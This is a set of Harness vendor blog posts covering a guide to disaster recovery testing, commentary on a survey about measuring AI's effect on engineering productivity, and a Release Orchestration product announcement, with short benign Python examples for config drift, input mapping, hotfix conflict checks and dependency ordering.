Harness Continuous Delivery provides end-to-end pipeline orchestration, built-in policy governance, GitOps-based change tracking, AI-assisted deployment verification, and real-time DORA metrics. It's designed to replace manual release processes with automated systems that scale across any environment.


Most organizations don't fail at disaster recovery because they lack technology. They fail because they never tested their plans under realistic conditions. A runbook that hasn't been rehearsed is just a document. A backup that hasn't been restored is just a hope. If you're new to the topic, start with our introduction to disaster recovery testing before diving into this guide.
This guide is for teams who want to move from theory to practice. Whether you're an SRE managing recovery playbooks or a manager responsible for business continuity outcomes, the steps here will help you build a DR testing program that holds up when it matters most.
We'll walk through why DR testing is foundational, how to run it end-to-end, where most teams hit friction, and how modern tooling, including Harness, can close those gaps.
The word "disaster" conjures floods and fires, but the most common causes of major incidents in 2026 are far more mundane. Ransomware, misconfigurations, expired certificates, regional cloud disruptions, supply chain compromises, and plain human error account for the vast majority of outages. The fallout is predictable: revenue loss, missed SLAs, compliance findings, and lasting damage to brand credibility.
Regulatory and contractual pressure is also increasing. Frameworks like ISO 22301, ISO/IEC 27001, PCI DSS, HIPAA, and FFIEC now expect documented evidence of periodic DR testing, recorded outcomes, and tracked remediation, not just recommendations. In cloud environments, shared responsibility models still place the burden of workload recovery squarely on customers.
Teams that test proactively gain real advantages:
The most effective DR programs treat testing as a product, not a project. A one-time exercise produces a snapshot. A repeatable lifecycle produces institutional resilience.
The lifecycle has three phases: Plan and Prepare, Execute and Monitor, and Review and Improve. Each phase feeds the next, and each test cycle should make the following one more efficient and more realistic.
A poorly scoped test wastes time and produces misleading results. Planning is about defining what success looks like before you start.
Don't skip the last point. Auditors and post-incident reviews both depend on evidence. If you can't prove what happened during the test, the test didn't happen.
Execution is where plans meet reality. The goal is to follow the runbook faithfully while capturing everything that deviates from expectations.
A common mistake is running the test and only reviewing results afterward. Active monitoring during execution lets you catch cascading failures early and make real-time decisions, which is exactly the skill you're building.
The after-action review is where a DR test becomes a DR program. Skip it, and you'll repeat the same failures.
Treat your DR testing checklist as a living document. Each cycle should produce a cleaner, more accurate version than the previous one.
Even well-intentioned DR programs run into predictable friction. Here's where teams typically struggle and how to build guardrails that help.
Full failover exercises require infrastructure, staff time, and a willingness to disrupt normal operations, all of which compete with feature delivery and day-to-day priorities.
The solution is a tiered testing schedule. Automate frequent, lightweight checks for lower-priority tiers. Reserve deep exercises for critical systems, and schedule them with enough lead time to secure capacity. Use on-demand cloud resources and ephemeral environments to run tests without provisioning dedicated infrastructure that sits idle between cycles.
Recovery doesn't belong to one team. It spans networking, security, databases, applications, and support functions. Without clear ownership, tests stall at handoff points.
Establish RACI matrices that specify who is responsible, accountable, consulted, and informed for each test phase. Secure executive sponsorship so that participation is a priority, not optional. Design scenarios that reflect the real risks each team faces. People engage more seriously when the exercise feels relevant to their work.
Tests routinely surface undocumented dependencies, third-party SLA gaps, inconsistent IAM policies, and backups that restore corrupted or incomplete data. These findings can feel like failures, but they're actually the whole point.
Prioritize findings by business impact and remediate iteratively. Maintain configuration baselines and use drift detection to keep recovery environments aligned with production. Retest after remediation to confirm the fix holds.
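At its simplest, drift detection is a structured diff between a production baseline and the recovery environment. The Python sketch below assumes both are available as flat key-value maps; the `config_drift` function and the example keys are hypothetical.

```python
def config_drift(production: dict, recovery: dict) -> dict:
    """Compare flat config maps and report keys that differ between environments."""
    missing = sorted(production.keys() - recovery.keys())
    extra = sorted(recovery.keys() - production.keys())
    changed = {
        key: {"production": production[key], "recovery": recovery[key]}
        for key in sorted(production.keys() & recovery.keys())
        if production[key] != recovery[key]
    }
    return {"missing": missing, "extra": extra, "changed": changed,
            "in_sync": not (missing or extra or changed)}
```

Running a check like this on a schedule, and again after each remediation, gives the retest step something concrete to confirm.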
Traditional DR testing required weeks of manual coordination, isolated toolchains, and one-off scripts that didn't connect to the systems teams already used. Harness Resilience Testing changes that by bringing chaos testing, load testing, and disaster recovery testing together in a single platform.
Instead of running each discipline separately, teams orchestrate everything inside their existing pipelines. Recovery steps can be validated automatically, failovers triggered and monitored within CI/CD workflows, and risks surfaced early, before they become incidents. The Harness Resilience Testing documentation walks through configuring and running these tests end-to-end, including chaos injection, load scenarios, and DR validation within a single orchestrated workflow.
The integrated approach removes the friction that causes most DR testing programs to atrophy. When testing fits into the tools and workflows engineers already use, it stops feeling like a separate project and becomes part of how work gets done. Teams using this kind of platform report faster recovery times and fewer surprises when real incidents occur.
A single DR test tells you where you stand on a single day, under a single set of conditions. A repeatable testing program tells you whether your resilience is improving over time and gives you the evidence to prove it to auditors, executives, and customers.
The lifecycle described here, planning with clear objectives, executing with discipline, and reviewing with rigor, is designed to compound. Each cycle should refine the next. Runbooks get sharper. Dependencies get documented. Gaps get closed before they become outages.
Once your testing process is solid, the next step is building a mature, metrics-driven program around it. In the next blog in this series, we'll cover DR testing best practices, the role of automation, and the metrics that tell you whether your resilience program is actually working. And if you missed the start of the series, catch up with our introduction to disaster recovery testing first.


For the past year, I've been hearing a version of the same thing from engineering leaders: AI tools are working, productivity is up, the business case is there. And yet, something about the picture still feels incomplete. So we decided to go find out how widespread that feeling actually is. We surveyed 700 engineers and managers across five countries, and published the results in the State of Engineering Excellence 2026.
89% of engineering leaders say developer productivity has improved since deploying AI. It's a clean story. AI is working. Engineering teams are moving faster.
But we also found that 81% of those same leaders say code review time has gone up since deploying AI, significantly so in a lot of cases. And developers estimate that roughly a third of their day is now consumed by AI-related work that remains largely invisible to traditional productivity metrics.
So which is it? Is AI making engineering teams more productive, or simply shifting effort into places they don’t yet measure? After sitting with this data for a few weeks, the answer is both. That's the more honest read, even if it's less satisfying.
AI has been very good at increasing output. It has not automatically delivered more shipped value.
I talked to a customer recently, a large enterprise engineering org, and they were genuinely proud of how much their output metrics had improved. Lines of code written, PR velocity per developer, tickets closed, features delivered. All of it up. Then we dug into what was actually making it to production, and the numbers looked much less clean. A meaningful share of AI-generated code was not getting to production.
Most organizations can tell you how much AI code was accepted. Very few can tell you how much of it actually landed in production, and that's the number that matters. Hard dollars spent on agent compute that never shipped anything isn't a productivity story. That's a visibility gap, and it's one most organizations aren't measuring today.
The 31% figure, the estimated share of developer time now consumed by AI-related work that appears in no metric, probably sounds abstract until you break down what it actually is.
It's a developer sitting with a pull request for 45 minutes because the AI-generated code is technically correct but written in a style nobody on the team recognizes, and they need to fully understand it before they can approve it. It's debugging a subtle edge case that the AI missed, which takes longer to track down than writing the function would have. It's working with 10 agents in parallel on 10 different tasks. None of this makes it into velocity or cycle time, and even code review metrics only catch a fraction of it.
What this data shows is that organizations are running a business where the costs are partially off the books. You can show your CFO a 20% productivity improvement and that's true. You just can't show them what it cost to get there.
The finding that surprised me most: 89% of engineering leaders say their current metrics accurately reflect AI's impact. And 94% say key factors like tech debt, validation time, and developer burnout are missing from those same metrics.
When there's no established standard for measuring something, people default to trusting the frameworks they already know. Not because they've validated them for the new environment, but because they're familiar. High confidence in an incomplete system is a coping mechanism, not an accuracy signal.
The lesson: confidence in your measurement system should go up as you add instrumentation, not stay high when important dimensions of the work are still invisible. When 94% of leaders acknowledge gaps and only 6% think they're equipped to close them, that's not a minor calibration issue. That's a signal worth taking seriously.
54% of practitioners fear individual performance evaluations based on AI productivity data. Managers, by contrast, show far greater comfort with these systems: they are nearly four times more likely than developers to report having no concerns at all.
Measurement systems almost always get built top-down, by the people who won't be measured by them. The practitioners who experience the day-to-day pressures of AI adoption, and who understand where invisible overhead actually lives, are rarely involved in defining the frameworks used to measure it. The result is a system that captures what leadership can see and misses what developers actually experience.
What developers said they need is straightforward: keep improvement data separate from performance evaluation, be transparent about what's being measured, and involve them in defining the metrics. None of that is technically hard. It requires organizational commitment. When measurement feels like surveillance, you don't get accurate data. You get people performing for the system instead of working in it.
The productivity gains from AI are real. The problem is that organizations are making multi-year investment decisions with dashboards built for a different era, and the gap between what those dashboards show and what's actually happening widens as AI adoption scales.
This is a problem we’ve been thinking deeply about at Harness. We’re working on new capabilities in Software Engineering Insights (SEI) that are designed to give engineering leaders visibility into the full picture: not just how much code is being generated, but how much of it is shipping, what the review and validation overhead actually looks like, and where AI spend is producing returns versus producing churn.
We believe the next generation of engineering measurement needs to be built for AI-native workflows, and we’ll be sharing more about that direction in the coming weeks.
Getting the measurement right isn't a reporting exercise. It's what makes the productivity gains from AI sustainable.
Download the full State of Engineering Excellence 2026 report.


Modern software delivery has evolved far beyond single-service deployments. Today's releases span dozens of services, multiple teams, and complex approval workflows—coordinated through spreadsheets, Slack channels, and manual checklists scattered across tools. When a production release involves deploying ten microservices across three environments, enabling five feature flags, running security scans, collecting approvals from four stakeholders, and coordinating with three different teams, the question isn't whether you can ship—it's whether you can track what shipped, when it shipped, and who approved it.
Release Orchestration solves this. It provides a unified framework for modeling, scheduling, automating, and tracking complex software releases across teams, tools, and environments—giving you end-to-end visibility from planning through production deployment and monitoring.
Without orchestration, enterprise releases become coordination nightmares. Status lives in spreadsheets that go stale within hours. Coordination happens through email threads spanning dozens of messages. There's no single source of truth for what was deployed, when, or by whom. Manual checklists drift out of sync. Approval workflows rely on memory and goodwill. And when something goes wrong at 2 AM, reconstructing what happened requires archaeology across multiple systems.
Release Orchestration transforms this chaos into structured, auditable, repeatable processes. Model your release blueprint once—defining phases, activities, dependencies, and approval gates—then execute it repeatedly with different configurations. Automate pipeline-backed steps while retaining manual sign-offs where governance requires them. Track activity-level status, phase-level progress, and overall release health in real time. Enforce approvals, capture sign-offs, and maintain a full audit trail linking code to deployment to business outcome.
The result? Releases that used to require days of coordination now run faster with complete visibility and zero spreadsheets.
Release Orchestration introduces a structured, visual approach to modeling and executing releases. Define Processes—reusable blueprints composed of Phases (Build, Testing, Deployment) and Activities (automated pipelines, manual approvals, or nested subprocesses). Release Groups define cadences and automatically generate releases. The Release Calendar provides unified visibility across all releases. The Activity Store and Input Store promote reusability—define once, execute many times with different configurations. And ad hoc releases let you execute any process on demand when you need flexibility outside your regular schedule.
At its core, Release Orchestration delivers the foundational capabilities enterprise teams need: process modeling with visual editors, scheduled and recurring releases through release groups, real-time execution tracking with dependency management, comprehensive audit trails for compliance, and AI-powered process creation that transforms natural language descriptions into structured workflows. These capabilities form the foundation for enterprise release management at scale.
Release Orchestration launches with a comprehensive set of capabilities designed for enterprise release management. Here's what you can do today.
Not every release fits a schedule. Customer-specific deployments, unscheduled maintenance, and process testing need one-off releases. Ad hoc releases let you create and execute releases on demand: select a process, configure timing, provide inputs, and optionally run immediately. Test new processes in isolation, handle customer deployments without disrupting your calendar, or orchestrate emergency maintenance with full tracking and audit capabilities.
Modern releases deploy multiple services across multiple environments. Release Orchestration's input system handles this through variable mapping: define global variables like `releaseVersion` and `targetEnvironment` once, and they flow automatically to all activities. Deploy to QA with "QA Inputs" and to production with "Production Inputs": same process, different configurations. This eliminates repetitive data entry, ensures consistency, and scales from three services to thirty without growing complexity.
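To make the idea of variable mapping concrete, here is a small conceptual sketch. It is not the Release Orchestration data model or API: the dictionary layout, the activity names, the version number, and the `resolve_inputs` helper are all assumptions made for illustration. Only `releaseVersion`, `targetEnvironment`, and the two input set names come from the description above.

```python
# Hypothetical input sets: same process, different configurations.
INPUT_SETS = {
    "QA Inputs": {"releaseVersion": "2.4.0", "targetEnvironment": "qa"},
    "Production Inputs": {"releaseVersion": "2.4.0", "targetEnvironment": "prod"},
}

# Each activity declares which global variables it consumes and the
# local parameter name it expects them under (names are illustrative).
ACTIVITY_MAPPINGS = {
    "deploy-checkout": {"version": "releaseVersion", "env": "targetEnvironment"},
    "deploy-payments": {"version": "releaseVersion", "env": "targetEnvironment"},
    "smoke-tests": {"env": "targetEnvironment"},
}


def resolve_inputs(input_set_name: str) -> dict:
    """Map the chosen input set's global variables onto every activity."""
    global_vars = INPUT_SETS[input_set_name]
    return {
        activity: {param: global_vars[var] for param, var in mapping.items()}
        for activity, mapping in ACTIVITY_MAPPINGS.items()
    }


for activity, params in resolve_inputs("QA Inputs").items():
    print(activity, params)
```

Adding a fourth or a thirtieth service means adding one mapping entry; the input sets themselves do not change, which is the property that keeps configuration from growing with the number of services.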
Release Orchestration integrates with Harness's centralized notification framework, delivering alerts when releases start, pause for input, complete, or fail. Route notifications to Slack, email, PagerDuty, Microsoft Teams, or webhooks. Platform teams managing multiple releases shift from reactive monitoring to proactive awareness—get notified immediately when action is required.
Compliance reviews and post-mortems require detailed records. Release Orchestration provides downloadable Excel reports with complete execution history—every activity, status, timestamps, approvals, and inputs used. Generate reports for individual releases (sprint retrospectives) or release groups (quarterly audits). Activity-level detail meets compliance needs; process-level overviews serve executive summaries. All execution data is captured in the audit trail, allowing you to reconstruct exactly what happened during any release.
As releases scale, filters help you focus. Filter by source (ad hoc vs recurring), status (in progress, completed, failed), time window (this sprint, Q1 2026), environment (production, staging), or scope (specific orgs/projects). Platform teams filter to ad hoc releases for one-off deployments. Release managers filter by status for in-progress releases. Compliance teams filter by date range for audit periods. Transform an overwhelming calendar into a focused view of exactly what you need.
Production incidents don't wait for your release cadence. Release Orchestration supports hotfix workflows that fast-track emergency releases while maintaining governance. Mark releases as hotfixes to distinguish them in calendars and reports. The system detects execution conflicts—if a hotfix targets an environment where a release is running, you get visibility to coordinate decisions. Hotfixes use the same process structure, ensuring that approvals and audit trails are maintained. The hotfix designation flows through reports and logs, documenting emergency procedures for post-incident reviews. Speed meets governance.
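The conflict check described here boils down to two conditions: same environment, overlapping execution window. The sketch below shows that logic in isolation. The `Release` class, its fields, and the sample releases are hypothetical and do not reflect how Harness stores or evaluates releases.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class Release:
    name: str
    environment: str
    start: datetime
    end: datetime
    is_hotfix: bool = False


def find_conflicts(hotfix: Release, scheduled: list[Release]) -> list[Release]:
    """Return releases that target the same environment as the hotfix
    and whose execution window overlaps with it."""
    return [
        r for r in scheduled
        if r.environment == hotfix.environment
        and r.start < hotfix.end      # r begins before the hotfix finishes
        and hotfix.start < r.end      # and the hotfix begins before r finishes
    ]


# Hypothetical releases, for illustration only.
scheduled = [
    Release("sprint-42", "production", datetime(2026, 3, 2, 9), datetime(2026, 3, 2, 12)),
    Release("sprint-42-qa", "staging", datetime(2026, 3, 2, 9), datetime(2026, 3, 2, 12)),
    Release("sprint-43", "production", datetime(2026, 3, 9, 9), datetime(2026, 3, 9, 12)),
]
hotfix = Release("fix-login", "production",
                 datetime(2026, 3, 2, 11), datetime(2026, 3, 2, 11, 30), is_hotfix=True)

print([r.name for r in find_conflicts(hotfix, scheduled)])
```

Note that the function only reports conflicts. Deciding whether to pause the running release or delay the hotfix stays with the people coordinating it.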
Not everything can be automated. Security reviews, architectural approvals, and stakeholder sign-offs require human judgment. Release Orchestration treats manual activities as first-class citizens with the same visibility and dependency support as automated activities. Manual activities pause execution until someone provides input—an approval, verification, or checklist confirmation. Notifications alert the responsible person; they review the context and complete the activity, optionally leaving notes. Manual activities can depend on automated activities (approval after deployment) or vice versa (deployment after approval). All completions appear in audit trails and reports for compliance documentation.
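Dependencies between manual and automated activities form a directed graph, and a valid execution order is a topological sort of that graph. The sketch below uses Python's standard `graphlib` module to show the idea. The activity names and the `kind` field are assumptions for illustration, not the product's schema.

```python
from graphlib import TopologicalSorter

# Hypothetical activities: each one lists the activities it depends on.
# "manual" vs "pipeline" marks who completes the step.
ACTIVITIES = {
    "build": {"kind": "pipeline", "depends_on": set()},
    "security-review": {"kind": "manual", "depends_on": {"build"}},
    "deploy-staging": {"kind": "pipeline", "depends_on": {"security-review"}},
    "stakeholder-signoff": {"kind": "manual", "depends_on": {"deploy-staging"}},
    "deploy-production": {"kind": "pipeline", "depends_on": {"stakeholder-signoff"}},
}


def execution_order(activities: dict) -> list[str]:
    """Return an order in which every activity follows its dependencies."""
    graph = {name: spec["depends_on"] for name, spec in activities.items()}
    return list(TopologicalSorter(graph).static_order())


for name in execution_order(ACTIVITIES):
    kind = ACTIVITIES[name]["kind"]
    action = "wait for human input" if kind == "manual" else "run pipeline"
    print(f"{name}: {action}")
```

Because manual and automated steps live in the same graph, an approval after a deployment and a deployment after an approval are modeled the same way: as an edge.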
Release Orchestration provides primitives—processes, phases, activities, dependencies, inputs—that compose to match how your organization ships software. Model microservice releases with parallel deployments and end-to-end tracking. Define compliance-driven releases with approval gates at critical checkpoints. Create streamlined hotfix workflows for emergencies. Coordinate feature flag enablement with deployments. Assign phase owners for multi-team coordination with notification-driven handoffs. The system scales from simple three-phase releases to complex workflows with fifty activities and nested subprocesses.
Harness AI transforms natural language descriptions into structured processes. Describe your workflow (for example, "Create a multi-service release with phases for build, testing, deployment, and monitoring. Assign owners for Development, QA, and DevOps.") and AI generates the complete structure with phases, activities, and dependencies. Refine the generated process by adding activities, adjusting dependencies, and configuring inputs. This reduces process modeling time from hours to minutes, making it practical to create specialized processes for different release types.
Release Orchestration provides real-time tracking at three levels: activity (running, succeeded, failed, waiting), phase (overall progress), and process (end-to-end status). The execution graph shows phases as nodes, dependencies as arrows, and color-coded status on each activity. Drill into pipeline executions from the release view with one click. See approval history for manual activities—who approved, when, and with what notes. This unified view eliminates the need to check multiple systems. Platform teams can see at a glance which releases are progressing smoothly, which are awaiting approval, and which need attention. [Learn more →](https://developer.harness.io/docs/release-orchestration/execution/activity-execution-flow)
Release Orchestration is available now in Harness. Contact Harness Support to enable the module for your account. Once enabled, explore Processes (model release blueprints), Release Calendar (schedule and track releases), Activity Store (reusable activities), and Input Store (configuration sets). The getting started guide walks you through creating your first AI-powered process, adding activities, and executing a release.
We're actively developing additional capabilities: deeper analytics and insights (release velocity metrics, phase duration trends, failure pattern analysis), advanced dependency modeling (cross-release dependencies, environment-level locking), enhanced collaboration (in-line comments, Slack-native monitoring), a template marketplace for common release patterns, and API/GitOps for managing processes as code. The roadmap prioritizes capabilities that help teams ship faster with greater confidence.
Software delivery has evolved far beyond single-service deployments, but release management tooling hasn't kept pace. Spreadsheets, email coordination, and manual checklists don't scale to modern microservice architectures, multi-team workflows, and compliance requirements. Release Orchestration provides the unified framework enterprise teams need to model, automate, and track complex releases across teams, tools, and environments.
Define reusable processes. Execute them with different inputs. Track activity-level progress. Enforce approvals and capture sign-offs. Maintain complete audit trails. All in one place, integrated with the pipelines and deployment workflows you already use.
Ready to see it in action? Explore the Release Orchestration documentation or reach out to your Harness account team to discuss how Release Orchestration can transform your release workflows.
The future of release management isn't about doing the same manual coordination faster—it's about orchestrating releases as structured, repeatable, auditable processes. That future is available today.